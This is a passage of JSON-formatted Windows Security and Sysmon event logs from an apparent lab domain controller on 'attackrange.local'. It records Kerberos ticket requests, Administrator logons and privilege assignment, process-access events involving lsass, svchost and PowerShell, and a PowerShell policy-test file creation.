C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.041","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220582,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220583,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220584,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220585,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8105C\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8105c","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BA6138E8-AAC0-A83A-70FC-5DED811F88B9}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220586,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8105C\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x8105c","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5529,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.041\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.041","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5530,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.041\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.041","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5531,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.056\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010200F0800}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.056","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010200F0800}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5532,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.056\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010200F0800}\r\nProcessId: 4740\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dxdozint.1h3.ps1\r\nCreationUtcTime: 2020-08-01 06:55:17.056","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.056","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010200F0800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dxdozint.1h3.ps1","CreationUtcTime":"2020-08-01 06:55:17.056","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5533,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.088\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010200F0800}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 